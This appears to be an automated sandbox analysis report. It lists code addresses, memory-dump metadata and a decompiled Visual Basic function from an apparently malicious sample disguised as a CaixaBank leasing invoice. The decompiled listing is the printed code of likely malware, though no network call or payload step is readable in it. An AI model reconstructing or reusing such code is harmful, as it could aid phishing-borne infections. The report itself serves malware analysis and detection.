        0x0040b36e
        0x0040b384
        0x0040b3a1
        0x0040b386
        0x0040b386
        0x0040b38b
        0x0040b390
        0x0040b395
        0x0040b395
        0x0040b3c5
        0x0040b3c9
        0x0040b3ce
        0x0040b3e9
        0x0040b3ef
        0x0040b3f1
        0x0040b3fe
        0x0040b423
        0x0040b400
        0x0040b400
        0x0040b405
        0x0040b40a
        0x0040b410
        0x0040b416
        0x0040b41b
        0x0040b41b
        0x0040b431
        0x0040b44e
        0x0040b433
        0x0040b433
        0x0040b438
        0x0040b43d
        0x0040b442
        0x0040b442
        0x0040b468
        0x0040b472
        0x0040b476
        0x0040b47b
        0x0040b493
        0x0040b499
        0x0040b49b
        0x0040b4a8
        0x0040b4cd
        0x0040b4aa
        0x0040b4aa
        0x0040b4af
        0x0040b4b4
        0x0040b4ba
        0x0040b4c0
        0x0040b4c5
        0x0040b4c5
        0x0040b4d4
        0x0040b4e1
        0x0040b4e7
        0x0040b4f1
        0x0040b4f4
        0x0040b4fb
        0x0040b505
        0x0040b515
        0x0040b521
        0x0040b535
        0x0040b566
        0x0040b571
        0x0040b57d
        0x0040b586
        0x0040b58c
        0x0040b590
        0x0040b594
        0x0040b595
        0x0040b597
        0x0040b59c
        0x0040b5a2
        0x0040b5ae
        0x0040b5cb
        0x0040b5b0
        0x0040b5b0
        0x0040b5b5
        0x0040b5ba
        0x0040b5bf
        0x0040b5bf
        0x0040b5ef
        0x0040b5f3
        0x0040b5f8
        0x0040b613
        0x0040b616
        0x0040b618
        0x0040b625
        0x0040b647
        0x0040b627
        0x0040b627
        0x0040b629
        0x0040b62e
        0x0040b634
        0x0040b63a
        0x0040b63f
        0x0040b63f
        0x0040b655
        0x0040b672
        0x0040b657
        0x0040b657
        0x0040b65c
        0x0040b661
        0x0040b666
        0x0040b666
        0x0040b696
        0x0040b69a
        0x0040b69f
        0x0040b6ba
        0x0040b6c0
        0x0040b6c2
        0x0040b6cf
        0x0040b6f4
        0x0040b6d1
        0x0040b6d1
        0x0040b6d6
        0x0040b6db
        0x0040b6e1
        0x0040b6e7
        0x0040b6ec
        0x0040b6ec
        0x0040b701
        0x0040b721
        0x0040b727
        0x0040b734
        0x0040b756
        0x0040b736
        0x0040b736
        0x0040b73b
        0x0040b740
        0x0040b743
        0x0040b749
        0x0040b74e
        0x0040b74e
        0x0040b760
        0x0040b764
        0x0040b765
        0x0040b767
        0x0040b76c
        0x0040b776
        0x0040b793
        0x0040b778
        0x0040b778
        0x0040b77d
        0x0040b782
        0x0040b787
        0x0040b787
        0x0040b7b7
        0x0040b7bb
        0x0040b7c0
        0x0040b7d8
        0x0040b7de
        0x0040b7e0
        0x0040b7ed
        0x0040b812
        0x0040b7ef
        0x0040b7ef
        0x0040b7f4
        0x0040b7f9
        0x0040b7ff
        0x0040b805
        0x0040b80a
        0x0040b80a
        0x0040b820
        0x0040b83d
        0x0040b822
        0x0040b822
        0x0040b827
        0x0040b82c
        0x0040b831
        0x0040b831
        0x0040b857
        0x0040b861
        0x0040b865
        0x0040b86a
        0x0040b885
        0x0040b88b
        0x0040b88d
        0x0040b89a
        0x0040b8bf
        0x0040b89c
        0x0040b89c
        0x0040b8a1
        0x0040b8a6
        0x0040b8ac
        0x0040b8b2
        0x0040b8b7
        0x0040b8b7
        0x0040b8cc
        0x0040b8d5
        0x0040b8db
        0x0040b8e5
        0x0040b8e8
        0x0040b905
        0x0040b914
        0x0040b91a
        0x0040b927
        0x0040b949
        0x0040b929
        0x0040b929
        0x0040b92e
        0x0040b933
        0x0040b936
        0x0040b93c
        0x0040b941
        0x0040b941
        0x0040b956
        0x0040b963
        0x0040b968
        0x0040b96e
        0x0040b97b
        0x0040b981
        0x0040b983
        0x0040b990
        0x0040b9b2
        0x0040b992
        0x0040b992
        0x0040b997
        0x0040b99c
        0x0040b99f
        0x0040b9a5
        0x0040b9aa
        0x0040b9aa
        0x0040b9b9
        0x0040b9c3
        0x0040b9cd
        0x0040b9e5
        0x0040b9fb
        0x0040ba18
        0x0040b9fd
        0x0040b9fd
        0x0040ba02
        0x0040ba07
        0x0040ba0c
        0x0040ba0c
        0x0040ba3c
        0x0040ba40
        0x0040ba45
        0x0040ba5d
        0x0040ba63
        0x0040ba65
        0x0040ba72
        0x0040ba97
        0x0040ba74
        0x0040ba74
        0x0040ba79
        0x0040ba7e
        0x0040ba84
        0x0040ba8a
        0x0040ba8f
        0x0040ba8f
        0x0040baa5
        0x0040bac2
        0x0040baa7
        0x0040baa7
        0x0040baac
        0x0040bab1
        0x0040bab6
        0x0040bab6
        0x0040badc
        0x0040bae6
        0x0040baea
        0x0040baef
        0x0040bb0a
        0x0040bb10
        0x0040bb12
        0x0040bb1f
        0x0040bb44
        0x0040bb21
        0x0040bb21
        0x0040bb26
        0x0040bb2b
        0x0040bb31
        0x0040bb37
        0x0040bb3c
        0x0040bb3c
        0x0040bb51
        0x0040bb5a
        0x0040bb60
        0x0040bb6a
        0x0040bb6d
        0x0040bb8a
        0x0040bb99
        0x0040bb9f
        0x0040bbac
        0x0040bbce
        0x0040bbae
        0x0040bbae
        0x0040bbb3
        0x0040bbb8
        0x0040bbbb
        0x0040bbc1
        0x0040bbc6
        0x0040bbc6
        0x0040bbdb
        0x0040bbe1
        0x0040bbe5
        0x0040bbe6
        0x0040bbe8
        0x0040bbed
        0x0040bbf3
        0x0040bbff
        0x0040bc1c
        0x0040bc01
        0x0040bc01
        0x0040bc06
        0x0040bc0b
        0x0040bc10
        0x0040bc10
        0x0040bc40
        0x0040bc44
        0x0040bc49
        0x0040bc64
        0x0040bc67
        0x0040bc69
        0x0040bc76
        0x0040bc98
        0x0040bc78
        0x0040bc78
        0x0040bc7a
        0x0040bc7f
        0x0040bc85
        0x0040bc8b
        0x0040bc90
        0x0040bc90
        0x0040bca6
        0x0040bcc3
        0x0040bca8
        0x0040bca8
        0x0040bcad
        0x0040bcb2
        0x0040bcb7
        0x0040bcb7
        0x0040bce7
        0x0040bceb
        0x0040bcf0
        0x0040bd0b
        0x0040bd11
        0x0040bd13
        0x0040bd20
        0x0040bd45
        0x0040bd22
        0x0040bd22
        0x0040bd27
        0x0040bd2c
        0x0040bd32
        0x0040bd38
        0x0040bd3d
        0x0040bd3d
        0x0040bd52
        0x0040bd72
        0x0040bd78
        0x0040bd85
        0x0040bda7
        0x0040bd87
        0x0040bd87
        0x0040bd8c
        0x0040bd91
        0x0040bd94
        0x0040bd9a
        0x0040bd9f
        0x0040bd9f
        0x0040bdb1
        0x0040bdb5
        0x0040bdb6
        0x0040bdb8
        0x0040bdbd
        0x0040bdc7
        0x0040bde4
        0x0040bdc9
        0x0040bdc9
        0x0040bdce
        0x0040bdd3
        0x0040bdd8
        0x0040bdd8
        0x0040be08
        0x0040be0c
        0x0040be11
        0x0040be2c
        0x0040be32
        0x0040be34
        0x0040be41
        0x0040be66
        0x0040be43
        0x0040be43
        0x0040be48
        0x0040be4d
        0x0040be53
        0x0040be59
        0x0040be5e
        0x0040be5e
        0x0040be74
        0x0040be91
        0x0040be76
        0x0040be76
        0x0040be7b
        0x0040be80
        0x0040be85
        0x0040be85
        0x0040beb5
        0x0040beb9
        0x0040bebe
        0x0040bed9
        0x0040bedf
        0x0040bee1
        0x0040beee
        0x0040bf13
        0x0040bef0
        0x0040bef0
        0x0040bef5
        0x0040befa
        0x0040bf00
        0x0040bf06
        0x0040bf0b
        0x0040bf0b
        0x0040bf21
        0x0040bf3e
        0x0040bf23
        0x0040bf23
        0x0040bf28
        0x0040bf2d
        0x0040bf32
        0x0040bf32
        0x0040bf58
        0x0040bf62
        0x0040bf66
        0x0040bf6b
        0x0040bf83
        0x0040bf89
        0x0040bf8b
        0x0040bf98
        0x0040bfbd
        0x0040bf9a
        0x0040bf9a
        0x0040bf9f
        0x0040bfa4
        0x0040bfaa
        0x0040bfb0
        0x0040bfb5
        0x0040bfb5
        0x0040bfc7
        0x0040bfcd
        0x0040bfd7
        0x0040bfda
        0x0040bfe7
        0x0040bff3
        0x0040bff9
        0x0040c003
        0x0040c020
        0x0040c04a
        0x0040c04f
        0x0040c055
        0x0040c057
        0x0040c058
        0x0040c059
        0x0040c05a
        0x0040c063
        0x0040c069
        0x0040c076
        0x0040c098
        0x0040c078
        0x0040c078
        0x0040c07d
        0x0040c082
        0x0040c085
        0x0040c08b
        0x0040c090
        0x0040c090
        0x0040c0a5
        0x0040c0ab
        0x0040c0af
        0x0040c0b3
        0x0040c0b4
        0x0040c0b6
        0x0040c0bb
        0x0040c0c1
        0x0040b9d6
        0x0040b9dc
        0x0040c146
        0x0040c14e
        0x0040c15d
        0x0040c169
        0x0040c171
        0x0040c174
        0x0040c17b
        0x0040c18a
        0x0040c194
        0x0040c1ae
        0x0040c196
        0x0040c196
        0x0040c19b
        0x0040c1a0
        0x0040c1a5
        0x0040c1a5
        0x0040c1c9
        0x0040c1cd
        0x0040c1d2
        0x0040c1e1
        0x0040c1e7
        0x0040c1e9
        0x0040c1f0
        0x0040c20c
        0x0040c1f2
        0x0040c1f2
        0x0040c1f7
        0x0040c1fc
        0x0040c1ff
        0x0040c202
        0x0040c207
        0x0040c207
        0x0040c213
        0x0040c216
        0x0040c21d
        0x0040c220
        0x0040c221
        0x0040c231
        0x0040c238
        0x0040c240
        0x0040c245
        0x0040c24b
        0x0040c4cd
        0x0040c4cd
        0x0040c4ce
        0x00000000
        0x0040c4ce
        0x0040c258
        0x0040c272
        0x0040c25a
        0x0040c25a
        0x0040c25f
        0x0040c264
        0x0040c269
        0x0040c269
        0x0040c28d
        0x0040c291
        0x0040c296
        0x0040c2a5
        0x0040c2ab
        0x0040c2ad
        0x0040c2b4
        0x0040c2d0
        0x0040c2b6
        0x0040c2b6
        0x0040c2bb
        0x0040c2c0
        0x0040c2c3
        0x0040c2c6
        0x0040c2cb
        0x0040c2cb
        0x0040c2db
        0x0040c2f8
        0x0040c2dd
        0x0040c2dd
        0x0040c2e2
        0x0040c2e7
        0x0040c2ec
        0x0040c2ec
        0x0040c31c
        0x0040c320
        0x0040c325
        0x0040c334
        0x0040c33a
        0x0040c33c
        0x0040c343
        0x0040c362
        0x0040c345
        0x0040c345
        0x0040c34a
        0x0040c34f
        0x0040c352
        0x0040c355
        0x0040c35a
        0x0040c35a
        0x0040c369
        0x0040c36b
        0x0040c36d
        0x0040c373
        0x0040c374
        0x0040c379
        0x0040c383
        0x0040c3a0
        0x0040c385
        0x0040c385
        0x0040c38a
        0x0040c38f
        0x0040c394
        0x0040c394
        0x0040c3ba
        0x0040c3c4
        0x0040c3c8
        0x0040c3cd
        0x0040c3dc
        0x0040c3df
        0x0040c3e1
        0x0040c3e8
        0x0040c404
        0x0040c3ea
        0x0040c3ea
        0x0040c3ec
        0x0040c3f1
        0x0040c3f4
        0x0040c3f7
        0x0040c3fc
        0x0040c3fc
        0x0040c411
        0x0040c417
        0x0040c41e
        0x0040c421
        0x0040c424
        0x0040c42a
        0x0040c431
        0x0040c434
        0x0040c438
        0x0040c43d
        0x0040c443
        0x0040c449
        0x0040c44f
        0x0040c456
        0x0040c459
        0x0040c45c
        0x0040c469
        0x0040c476
        0x0040c47c
        0x0040c47e
        0x0040c485
        0x0040c4a4
        0x0040c487
        0x0040c487
        0x0040c48c
        0x0040c491
        0x0040c494
        0x0040c497
        0x0040c49c
        0x0040c49c
        0x0040c4ae
        0x0040c4b2
        0x0040c4b6
        0x0040c4b7
        0x0040c4ba
        0x0040c4bb
        0x0040c4bd
        0x0040c4c8
        0x00000000
        0x0040c4c8
        0x0040b9e2
        0x0040b9e2
        0x0040c0d8
        0x0040c0da
        0x0040c119
        0x0040c121
        0x0040c126
        0x00401b36
        0x00401b36
        0x00401b39
        0x00401b3a
        0x00000000
        0x00401b3a

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1172948703.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1172930676.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1172990240.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1173000183.0000000000410000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 .jbxd
        Similarity
        • API ID: #100
        • String ID: VB5!6&*
        • API String ID: 1341478452-3593831657
        • Opcode ID: 3984351f393d1767ad0a1bad397ee5f26065499ca3565c6cc18e5b53e2e1e837
        • Instruction ID: 8efc74844c808858beeed89ed76983cf5ca5600a4b41d838630f963d1329d26e
        • Opcode Fuzzy Hash: 3984351f393d1767ad0a1bad397ee5f26065499ca3565c6cc18e5b53e2e1e837
        • Instruction Fuzzy Hash: 1F81332144E3C19FC7138B749DA62A67FB0AE1331471E41DBC4C2DE5B3E62C5A5AC726
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 56%
        			E0040A7C4(void* __ebx, void* __edi, void* __esi, signed int _a4) {
        				intOrPtr* _v0;
        				signed int _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				signed int _v28;
        				char _v32;
        				char _v36;
        				char _v40;
        				char _v44;
        				signed int _v52;
        				void* _v56;
        				char _v60;
        				char _v68;
        				intOrPtr _v72;
        				intOrPtr _v76;
        				signed int _v80;
        				char _v84;
        				void* _v88;
        				signed int _v92;
        				signed int _v96;
        				signed int _v100;
        				intOrPtr* _v104;
        				signed int _v108;
        				signed int _v112;
        				intOrPtr _v120;
        				intOrPtr* _v124;
        				signed int _v128;
        				intOrPtr* _v132;
        				signed int _v136;
        				intOrPtr* _v140;
        				signed int _v144;
        				intOrPtr* _v148;
        				signed int _v152;
        				char* _v156;
        				intOrPtr _v160;
        				char* _v164;
        				char* _v168;
        				signed int _v172;
        				signed int _v176;
        				char _v196;
        				char _v200;
        				char _v204;
        				char _v208;
        				char _v212;
        				intOrPtr _v216;
        				char _v220;
        				intOrPtr _v224;
        				char _v228;
        				char _v232;
        				char _v236;
        				signed int _v240;
        				signed int _v244;
        				signed int _v248;
        				signed int _v252;
        				signed int _v256;
        				signed int _v260;
        				signed int _v264;
        				intOrPtr _v268;
        				intOrPtr _v272;
        				signed int _v284;
        				signed int _v288;
        				signed int _v292;
        				signed int _v296;
        				signed int _v300;
        				signed int _v304;
        				signed int _v308;
        				intOrPtr* _v312;
        				signed int _v316;
        				char _v320;
        				signed int _v324;
        				signed int _v328;
        				intOrPtr* _v332;
        				signed int _v336;
        				signed int _v340;
        				intOrPtr* _v344;
        				signed int _v348;
        				signed int _v352;
        				signed int _v356;
        				intOrPtr* _v360;
        				signed int _v364;
        				intOrPtr* _v368;
        				signed int _v372;
        				intOrPtr* _v376;
        				signed int _v380;
        				intOrPtr* _v384;
        				signed int _v388;
        				signed int _v392;
        				intOrPtr* _v396;
        				signed int _v400;
        				intOrPtr* _v404;
        				signed int _v408;
        				intOrPtr* _v412;
        				signed int _v416;
        				intOrPtr* _v420;
        				signed int _v424;
        				intOrPtr* _v428;
        				signed int _v432;
        				signed int _v436;
        				intOrPtr* _v440;
        				signed int _v444;
        				void* _v448;
        				signed int _v452;
        				signed int _v456;
        				signed int _v460;
        				intOrPtr* _v464;
        				signed int _v468;
        				intOrPtr* _v472;
        				signed int _v476;
        				signed int _v480;
        				intOrPtr* _v484;
        				signed int _v488;
        				intOrPtr* _v492;
        				signed int _v496;
        				signed int _v500;
        				intOrPtr* _v504;
        				signed int _v508;
        				intOrPtr* _v512;
        				signed int _v516;
        				intOrPtr* _v520;
        				signed int _v524;
        				signed int _v528;
        				intOrPtr* _v796;
        				intOrPtr _v808;
        				intOrPtr _v812;
        				intOrPtr _v816;
        				signed int _t874;
        				signed int* _t877;
        				signed int _t883;
        				signed int _t887;
        				signed int* _t891;
        				signed int _t892;
        				signed int _t897;
        				signed int _t901;
        				signed int _t906;
        				signed int _t910;
        				signed int _t914;
        				signed int _t925;
        				signed int _t932;
        				signed int _t937;
        				signed int _t941;
        				signed int _t953;
        				signed int _t957;
        				signed int _t961;
        				signed int _t965;
        				signed int _t969;
        				signed int _t973;
        				signed int _t983;
        				signed int _t991;
        				signed int _t995;
        				signed int _t999;
        				signed int _t1003;
        				signed int _t1007;
        				signed int _t1011;
        				signed int _t1031;
        				signed int _t1035;
        				signed int _t1039;
        				signed int _t1043;
        				signed int _t1047;
        				signed int _t1053;
        				signed int _t1057;
        				signed int _t1061;
        				signed int _t1065;
        				signed int _t1073;
        				signed int _t1078;
        				void* _t1080;
        				signed int _t1084;
        				signed int _t1088;
        				signed int _t1092;
        				signed int _t1096;
        				signed int _t1104;
        				signed int _t1110;
        				signed int _t1114;
        				signed int _t1118;
        				signed int _t1122;
        				signed int _t1126;
        				signed int _t1132;
        				signed int _t1136;
        				signed int _t1140;
        				signed int _t1144;
        				signed int _t1148;
        				signed int _t1152;
        				signed int _t1162;
        				signed int _t1168;
        				char* _t1177;
        				signed int _t1181;
        				char* _t1183;
        				char* _t1184;
        				char* _t1188;
        				signed int _t1192;
        				signed int _t1196;
        				signed int _t1200;
        				char* _t1205;
        				signed int _t1209;
        				char* _t1210;
        				signed int _t1213;
        				signed int _t1222;
        				signed int _t1226;
        				void* _t1227;
        				intOrPtr _t1242;
        				intOrPtr _t1246;
        				intOrPtr _t1257;
        				intOrPtr _t1267;
        				intOrPtr _t1280;
        				intOrPtr _t1291;
        				intOrPtr _t1307;
        				intOrPtr _t1325;
        				long long* _t1337;
        				signed int* _t1346;
        				void* _t1347;
        				void* _t1348;
        				void* _t1350;
        				intOrPtr _t1351;
        				void* _t1352;
        				void* _t1353;
        				void* _t1354;
        				void* _t1355;
        				void* _t1356;
        				long long* _t1357;
        				intOrPtr* _t1358;
        				void* _t1359;
        				long long* _t1360;
        				intOrPtr _t1361;
        				char** _t1362;
        				char* _t1448;
        				char* _t1449;
        				char* _t1450;
        
        				_t1227 = __ebx;
        				_t1348 = _t1350;
        				_t1351 = _t1350 - 0xc;
        				 *[fs:0x0] = _t1351;
        				L00401240();
        				_v16 = _t1351;
        				_v12 = 0x401158;
        				_v8 = _a4 & 0x00000001;
        				_a4 = _a4 & 0xfffffffe;
        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401246, _t1347);
        				_v136 = L"VB.PictureBox";
        				_v144 = 8;
        				_v168 = L"Vagabondiser";
        				_v176 = 8;
        				_t874 =  *((intOrPtr*)( *_a4 + 0x218))(_a4,  &_v84);
        				asm("fclex");
        				_v240 = _t874;
        				if(_v240 >= 0) {
        					_v308 = _v308 & 0x00000000;
        				} else {
        					_push(0x218);
        					_push(0x402aa8);
        					_push(_a4);
        					_push(_v240);
        					L0040137E();
        					_v308 = _t874;
        				}
        				_push(0x10);
        				L00401240();
        				asm("movsd");
        				asm("movsd");
        				asm("movsd");
        				asm("movsd");
        				_push(0x10);
        				L00401240();
        				asm("movsd");
        				asm("movsd");
        				asm("movsd");
        				asm("movsd");
        				_push(2);
        				_push(L"Add");
        				_push(_v84);
        				_t877 =  &_v112;
        				_push(_t877); // executed
        				L00401384(); // executed
        				_t1352 = _t1351 + 0x30;
        				_push(_t877);
        				L0040138A();
        				_push(_t877);
        				_push( &_v68);
        				L00401390();
        				L00401378();
        				L00401372();
        				_v136 = 0x350;
        				_v144 = 2;
        				_push(0x10);
        				L00401240();
        				asm("movsd");
        				asm("movsd");
        				asm("movsd");
        				asm("movsd");
        				_push( &M00402CA8);
        				_push(_v68);
        				L0040136C();
        				if( *0x40e010 != 0) {
        					_v312 = 0x40e010;
        				} else {
        					_push(0x40e010);
        					_push(0x401f6c);
        					L00401360();
        					_v312 = 0x40e010;
        				}
        				_t883 =  &_v84;
        				L00401366();
        				_v240 = _t883;
        				_t887 =  *((intOrPtr*)( *_v240 + 0x110))(_v240,  &_v196, _t883,  *((intOrPtr*)( *((intOrPtr*)( *_v312)) + 0x304))( *_v312));
        				asm("fclex");
        				_v244 = _t887;
        				if(_v244 >= 0) {
        					_v316 = _v316 & 0x00000000;
        				} else {
        					_push(0x110);
        					_push(0x402cb4);
        					_push(_v240);
        					_push(_v244);
        					L0040137E();
        					_v316 = _t887;
        				}
        				_v136 = _v196;
        				_v144 = 2;
        				_push(0x10);
        				L00401240();
        				asm("movsd");
        				asm("movsd");
        				asm("movsd");
        				asm("movsd");
        				_push("Top");
        				_push(_v68);
        				L0040136C();
        				L00401378();
        				_v136 = _v136 | 0xffffffff;
        				_v144 = 0xb;
        				_push(0x10);
        				L00401240();
        				asm("movsd");
        				asm("movsd");
        				asm("movsd");
        				asm("movsd");
        				_push(L"Visible");
        				_push(_v68);
        				L0040136C();
        				_v136 = _v136 | 0xffffffff;
        				_v144 = 0x800b;
        				_push(0);
        				_push(L"Enabled");
        				_push(_v68);
        				_t891 =  &_v112;
        				_push(_t891);
        				L00401384();
        				_t1353 = _t1352 + 0x10;
        				_push(_t891);
        				_t892 =  &_v144;
        				_push(_t892);
        				L0040135A();
        				_v240 = _t892;
        				L00401372();
        				if(_v240 != 0) {
        					if( *0x40eb0c != 0) {
        						_v320 = 0x40eb0c;
        					} else {
        						_push(0x40eb0c);
        						_push(0x402d0c);
        						L00401360();
        						_v320 = 0x40eb0c;
        					}
        					_v240 =  *_v320;
        					_t1222 =  *((intOrPtr*)( *_v240 + 0x1c))(_v240,  &_v84);
        					asm("fclex");
        					_v244 = _t1222;
        					if(_v244 >= 0) {
        						_v324 = _v324 & 0x00000000;
        					} else {
        						_push(0x1c);
        						_push(0x402cfc);
        						_push(_v240);
        						_push(_v244);
        						L0040137E();
        						_v324 = _t1222;
        					}
        					_v248 = _v84;
        					_t1226 =  *((intOrPtr*)( *_v248 + 0x50))(_v248);
        					asm("fclex");
        					_v252 = _t1226;
        					if(_v252 >= 0) {
        						_v328 = _v328 & 0x00000000;
        					} else {
        						_push(0x50);
        						_push(0x402d1c);
        						_push(_v248);
        						_push(_v252);
        						L0040137E();
        						_v328 = _t1226;
        					}
        					L00401378();
        				}
        				if( *0x40e010 != 0) {
        					_v332 = 0x40e010;
        				} else {
        					_push(0x40e010);
        					_push(0x401f6c);
        					L00401360();
        					_v332 = 0x40e010;
        				}
        				_t897 =  &_v84;
        				L00401366();
        				_v240 = _t897;
        				_t901 =  *((intOrPtr*)( *_v240 + 0x160))(_v240,  &_v196, _t897,  *((intOrPtr*)( *((intOrPtr*)( *_v332)) + 0x314))( *_v332));
        				asm("fclex");
        				_v244 = _t901;
        				if(_v244 >= 0) {
        					_v336 = _v336 & 0x00000000;
        				} else {
        					_push(0x160);
        					_push(0x402d2c);
        					_push(_v240);
        					_push(_v244);
        					L0040137E();
        					_v336 = _t901;
        				}
        				_v200 = 0x43ed;
        				_v104 = 0xd200;
        				_v112 = 3;
        				_t906 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v112,  &_v200, _v196);
        				_v248 = _t906;
        				if(_v248 >= 0) {
        					_v340 = _v340 & 0x00000000;
        				} else {
        					_push(0x6f8);
        					_push(0x402adc);
        					_push(_a4);
        					_push(_v248);
        					L0040137E();
        					_v340 = _t906;
        				}
        				L00401378();
        				L00401372();
        				if( *0x40e010 != 0) {
        					_v344 = 0x40e010;
        				} else {
        					_push(0x40e010);
        					_push(0x401f6c);
        					L00401360();
        					_v344 = 0x40e010;
        				}
        				_t1242 =  *((intOrPtr*)( *_v344));
        				_t910 =  &_v84;
        				L00401366();
        				_v240 = _t910;
        				_t914 =  *((intOrPtr*)( *_v240 + 0x50))(_v240,  &_v80, _t910,  *((intOrPtr*)(_t1242 + 0x300))( *_v344));
        				asm("fclex");
        				_v244 = _t914;
        				if(_v244 >= 0) {
        					_v348 = _v348 & 0x00000000;
        				} else {
        					_push(0x50);
        					_push(0x402cb4);
        					_push(_v240);
        					_push(_v244);
        					L0040137E();
        					_v348 = _t914;
        				}
        				_v228 = 0x24ef09a0;
        				_v224 = 0x5af6;
        				_v120 = 0x1ffaec;
        				_v128 = 3;
        				_v204 =  *0x401154;
        				_v284 = _v80;
        				_v80 = _v80 & 0x00000000;
        				_v104 = _v284;
        				_v112 = 8;
        				_v220 = 0x9430efd0;
        				_v216 = 0x5b01;
        				_v152 =  *0x401150;
        				_v168 =  *0x401148;
        				_t925 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v220,  &_v112, _t1242, _t1242,  &_v204,  &_v128, _t1242,  &_v228, 0x43b490,  &_v196);
        				_v248 = _t925;
        				if(_v248 >= 0) {
        					_v352 = _v352 & 0x00000000;
        				} else {
        					_push(0x6fc);
        					_push(0x402adc);
        					_push(_a4);
        					_push(_v248);
        					L0040137E();
        					_v352 = _t925;
        				}
        				_v40 = _v196;
        				L00401378();
        				L00401354();
        				_t1354 = _t1353 + 0xc;
        				_t932 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v196, 2,  &_v112,  &_v128);
        				_v240 = _t932;
        				if(_v240 >= 0) {
        					_v356 = _v356 & 0x00000000;
        				} else {
        					_push(0x700);
        					_push(0x402adc);
        					_push(_a4);
        					_push(_v240);
        					L0040137E();
        					_v356 = _t932;
        				}
        				_v32 = _v196;
        				if( *0x40e010 != 0) {
        					_v360 = 0x40e010;
        				} else {
        					_push(0x40e010);
        					_push(0x401f6c);
        					L00401360();
        					_v360 = 0x40e010;
        				}
        				_t1246 =  *((intOrPtr*)( *_v360));
        				_t937 =  &_v84;
        				L00401366();
        				_v240 = _t937;
        				_t941 =  *((intOrPtr*)( *_v240 + 0x160))(_v240,  &_v204, _t937,  *((intOrPtr*)(_t1246 + 0x310))( *_v360));
        				asm("fclex");
        				_v244 = _t941;
        				if(_v244 >= 0) {
        					_v364 = _v364 & 0x00000000;
        				} else {
        					_push(0x160);
        					_push(0x402d3c);
        					_push(_v240);
        					_push(_v244);
        					L0040137E();
        					_v364 = _t941;
        				}
        				_v208 =  *0x401140;
        				_v136 = _v204;
        				_v144 = 3;
        				_v220 =  *0x401138;
        				_v232 =  *0x401130;
        				L00401240();
        				asm("movsd");
        				asm("movsd");
        				asm("movsd");
        				asm("movsd");
        				 *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v220, 0x10, 0x55ed, _t1246, _t1246, 0xd890ffc0, 0x5b07,  &_v208,  &_v112);
        				L0040134E();
        				L00401378();
        				if( *0x40e010 != 0) {
        					_v368 = 0x40e010;
        				} else {
        					_push(0x40e010);
        					_push(0x401f6c);
        					L00401360();
        					_v368 = 0x40e010;
        				}
        				_t953 =  &_v84;
        				L00401366();
        				_v240 = _t953;
        				_t957 =  *((intOrPtr*)( *_v240 + 0x158))(_v240,  &_v196, _t953,  *((intOrPtr*)( *((intOrPtr*)( *_v368)) + 0x308))( *_v368));
        				asm("fclex");
        				_v244 = _t957;
        				if(_v244 >= 0) {
        					_v372 = _v372 & 0x00000000;
        				} else {
        					_push(0x158);
        					_push(0x402d4c);
        					_push(_v240);
        					_push(_v244);
        					L0040137E();
        					_v372 = _t957;
        				}
        				if( *0x40e010 != 0) {
        					_v376 = 0x40e010;
        				} else {
        					_push(0x40e010);
        					_push(0x401f6c);
        					L00401360();
        					_v376 = 0x40e010;
        				}
        				_t961 =  &_v88;
        				L00401366();
        				_v248 = _t961;
        				_t965 =  *((intOrPtr*)( *_v248 + 0x1a0))(_v248,  &_v204, _t961,  *((intOrPtr*)( *((intOrPtr*)( *_v376)) + 0x308))( *_v376));
        				asm("fclex");
        				_v252 = _t965;
        				if(_v252 >= 0) {
        					_v380 = _v380 & 0x00000000;
        				} else {
        					_push(0x1a0);
        					_push(0x402d4c);
        					_push(_v248);
        					_push(_v252);
        					L0040137E();
        					_v380 = _t965;
        				}
        				if( *0x40e010 != 0) {
        					_v384 = 0x40e010;
        				} else {
        					_push(0x40e010);
        					_push(0x401f6c);
        					L00401360();
        					_v384 = 0x40e010;
        				}
        				_t1257 =  *((intOrPtr*)( *_v384));
        				_t969 =  &_v92;
        				L00401366();
        				_v256 = _t969;
        				_t973 =  *((intOrPtr*)( *_v256 + 0x108))(_v256,  &_v80, _t969,  *((intOrPtr*)(_t1257 + 0x300))( *_v384));
        				asm("fclex");
        				_v260 = _t973;
        				if(_v260 >= 0) {
        					_v388 = _v388 & 0x00000000;
        				} else {
        					_push(0x108);
        					_push(0x402cb4);
        					_push(_v256);
        					_push(_v260);
        					L0040137E();
        					_v388 = _t973;
        				}
        				_v288 = _v80;
        				_v80 = _v80 & 0x00000000;
        				_v104 = _v288;
        				_v112 = 8;
        				_v228 =  *0x401128;
        				_v220 =  *0x401120;
        				_v136 = 0x8909d4;
        				_v144 = 3;
        				_v320 =  *0x401118;
        				L00401240();
        				asm("movsd");
        				asm("movsd");
        				asm("movsd");
        				asm("movsd");
        				_t983 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, 0x10,  &_v220, 0xdd379050, 0x5afa, _v196,  &_v228, _v204, _t1257, _t1257,  &_v112,  &_v208);
        				_v264 = _t983;
        				if(_v264 >= 0) {
        					_v392 = _v392 & 0x00000000;
        				} else {
        					_push(0x704);
        					_push(0x402adc);
        					_push(_a4);
        					_push(_v264);
        					L0040137E();
        					_v392 = _t983;
        				}
        				_v60 = _v208;
        				_push( &_v92);
        				_push( &_v88);
        				_push( &_v84);
        				_push(3);
        				L00401348();
        				_t1355 = _t1354 + 0x10;
        				L00401372();
        				if( *0x40e010 != 0) {
        					_v396 = 0x40e010;
        				} else {
        					_push(0x40e010);
        					_push(0x401f6c);
        					L00401360();
        					_v396 = 0x40e010;
        				}
        				_t991 =  &_v84;
        				L00401366();
        				_v240 = _t991;
        				_t995 =  *((intOrPtr*)( *_v240 + 0x78))(_v240,  &_v204, _t991,  *((intOrPtr*)( *((intOrPtr*)( *_v396)) + 0x304))( *_v396));
        				asm("fclex");
